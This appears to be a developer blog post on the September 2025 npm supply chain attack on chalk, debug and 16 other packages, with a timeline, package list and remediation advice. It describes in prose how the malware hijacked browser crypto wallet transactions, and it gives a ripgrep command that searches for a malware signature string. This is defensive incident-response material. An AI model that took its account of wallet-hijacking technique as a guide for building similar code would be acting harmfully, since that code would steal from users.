ST

Published

- 5 min read

Largest npm Supply Chain Attack Ever: Aikido Security's Discovery, Technical Breakdown, and Remediation

Node.js npm Security JavaScript
img of Largest npm Supply Chain Attack Ever: Aikido Security's Discovery, Technical Breakdown, and Remediation

Largest npm Supply Chain Attack Ever: How Aikido Security Detected It and What Developers Must Do Now

A massive, rapid npm supply chain compromise hit the JavaScript ecosystem in September 2025, affecting 18 core packages including chalk, debug, and others with over 2.6 billion combined weekly downloads. This article offers a step-by-step account of how Aikido Security first discovered the incident, the underlying malware techniques, how it spread via transitive dependencies, and actionable steps for audit, detection, and cleanup. For ongoing updates, Aikido’s live incident log is referenced, and I’ll continuously maintain my own findings and tips here.

1. Attack Timeline and Aikido’s Discovery

On September 8, 2025, Aikido Security threat researchers spotted suspicious npm activity linked to the qix- maintainer at 13:16 UTC. Their early alert kicked off one of the fastest security responses in recent npm history.

Key Points:

  • A phishing email from npmjs.help enabled attackers to breach the trusted maintainer’s npm account by collecting credentials and bypassing 2FA.
  • Malicious versions of 18 widely consumed npm packages were released and live for roughly two hours, just long enough to infiltrate potentially millions of projects.
  • Aikido immediately published their findings and initiated coordinated takedowns.

The Full List of Compromised Packages:

Package NameWeekly Downloads (Millions)Purpose
ansi-styles371.41Terminal styling
debug357.60Debugging utility
chalk299.99Terminal string coloring
supports-color287.1Color support detection
strip-ansi261.17Strip ANSI escape codes
ansi-regex243.64Regex for ANSI escape codes
wrap-ansi197.99Text wrapping in terminals
color-convert193.5Color format conversion
color-name191.71Color name mappings
is-arrayishArray utility
slice-ansiSlice ANSI escape codes
color-stringParse and serialize colors
simple-swizzleArgument normalization
has-ansiCheck for ANSI presence
supports-hyperlinksTerminal hyperlink support
error-exEnhanced error objects
chalk-templateChalk template strings
backslashBackslash escaping

(Exact download counts for some smaller packages vary but all are integral micro-packages with deep dependency penetration.)

For verified, real-time updates and new remediation steps, refer to Aikido’s live incident log:
Aikido Threat Log & Ongoing Updates.

I will keep updating this blog with new package lists, threats, and best practices as more technical analysis appears. Bookmark or follow for dynamic, developer-focused advisories.

2. Why Your App Might Be Affected — Even If You Never Installed These Packages Directly

Most npm projects don’t use chalk or debug outright. But these micro-packages underpin core UI libraries, build tools, and backend frameworks, meaning transitive dependencies can silently import the malware.

  • Indirect usage: Your builds might include infected code just by referencing popular frameworks.
  • Automated deployments: CI/CD systems often pick up the most recent releases, sometimes caching the bad versions.
  • Unawareness: Developers may already have deployed builds that contain the theft code, especially those pushed live in the attack window.

What This Means:
Even if your package.json doesn’t mention compromised packages, you must audit lockfiles and dependency trees carefully!

3. Technical Breakdown: Malware Actions and Browser/Wallet Targeting

Malware Details

  • Injected code runs only in browser contexts, not in server-side Node.js/apps.
  • Hooks into Web3 providers like MetaMask using window.ethereum, rewrites payment addresses using Levenshtein-based matching for “lookalike” fraud.
  • Targets multiple chains: Ethereum, Bitcoin, Solana, others.
  • Monitors fetch/XHR traffic to hijack crypto wallet transactions, especially those using popular dapps, wallet browser extensions, or direct blockchain calls.

4. How to Detect and Audit Infected Code

Ripgrep (rg) Command: Safe Usage

Security teams recommend ripgrep (rg) as a fast, safe tool for malware indicator scanning. This does not modify files, only searches for traces.

   
rg -u --max-columns=80 _0x112fa8
  • -u ensures hidden dirs (like node_modules) are searched.
  • --max-columns=80 helps with readable output.
  • The string _0x112fa8 is a malware signature flagged by Aikido’s analysis.

If you find matches, update all dependencies and wipe all infected builds. If not, still check your lockfiles and redeploy clean builds if your team’s deploys happened between attack times.

5. Impact and Remediation: What Developers and Organizations Must Know

Thanks to the rapid detection and response, the malicious package versions were live only about two hours. Yet due to the immense reach via transitive dependencies, the attack’s exposure is broad.

Exposure Beyond Direct Usage

Because many JavaScript projects depend indirectly on the compromised utilities, even applications that don’t explicitly use these packages could have bundled the malicious code unknowingly. Compounding this, CI/CD pipelines automatically fetch dependencies, so development teams may be unaware their deployed builds during the attack window contain the malware.

Thus, silent inclusion in builds and deployments presents ongoing risk.

Immediate Recommendations to Remediate

  1. Audit and Update Dependencies:
    Scan package-lock.json or yarn.lock for compromised package versions published Sept 8, 2025, and later. Upgrade to clean releases.

  2. Rebuild and Redeploy:
    Rebuild any software built or deployed within the attack window using clean dependencies.

  3. Scan for Malware Indicators:
    Use the rg command above and modern security scanners to detect suspicious payloads.

  4. Strengthen Authentication:
    Adopt hardware security keys and enforce multi-factor authentication on npm publishing accounts.

  5. Monitor Wallet and User Activity:
    Especially for crypto-enabled apps, watch for suspicious wallet activity or user complaints.

Lessons Learned and Broader Implications

  • Concentration of Trust: One compromised maintainer account cascaded into billions of downloads affected.
  • Micro-Package Risks: Extremely deep dependency graphs are a security challenge.
  • Phishing Sophistication: The attackers’ convincing spoofing of email and domains highlights social engineering as a primary threat.

Best Practices Going Forward

  • Use and commit package lockfiles for deterministic builds.
  • Pin dependency versions in production.
  • Regularly run npm audit or equivalent scans.
  • Enable hardware 2FA on all maintainer accounts.
  • Educate developers on phishing and social engineering threats.
  • Implement monitoring and rapid incident response protocols.

Conclusion

The September 2025 npm supply chain attack highlights the fragility of software supply chains and the importance of advanced detection and response practices. The swift community and security team action limited damage, but the incident urges everyone to remain vigilant and improve open source ecosystem security continuously.

Stay updated with official npm advisories and apply security patches immediately. Use ripgrep and other security tools regularly to uncover hidden compromises in your project dependencies.

This blog will be maintained with ongoing updates as new information and tooling emerge. Bookmark or subscribe for continuing analysis and remediation advice.